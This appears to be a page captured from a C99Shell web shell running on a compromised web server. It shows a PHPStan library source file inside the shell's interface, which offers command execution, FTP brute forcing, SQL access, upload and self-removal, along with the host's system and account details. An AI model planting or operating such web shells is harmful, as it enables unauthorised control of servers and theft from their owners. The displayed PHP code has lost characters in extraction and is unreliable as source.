!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/phpstan/phpdoc-parser/src/Ast/ConstExpr/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     DoctrineConstExprStringNode.php (1 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php declare(strict_types 1);

namespace 
PHPStan\PhpDocParser\Ast\ConstExpr;

use 
PHPStan\PhpDocParser\Ast\NodeAttributes;
use function 
sprintf;
use function 
str_replace;
use function 
strlen;
use function 
substr;

class 
DoctrineConstExprStringNode extends ConstExprStringNode
{

    use 
NodeAttributes;

    
/** @var string */
    
public $value;

    public function 
__construct(string $value)
    {
        
parent::__construct($value);
        
$this->value $value;
    }

    public function 
__toString(): string
    
{
        return 
self::escape($this->value);
    }

    public static function 
unescape(string $value): string
    
{
        
// from https://github.com/doctrine/annotations/blob/a9ec7af212302a75d1f92fa65d3abfbd16245a2a/lib/Doctrine/Common/Annotations/DocLexer.php#L103-L107
        
return str_replace('""''"'substr($value1strlen($value) - 2));
    }

    private static function 
escape(string $value): string
    
{
        
// from https://github.com/phpstan/phpdoc-parser/issues/205#issuecomment-1662323656
        
return sprintf('"%s"'str_replace('"''""'$value));
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--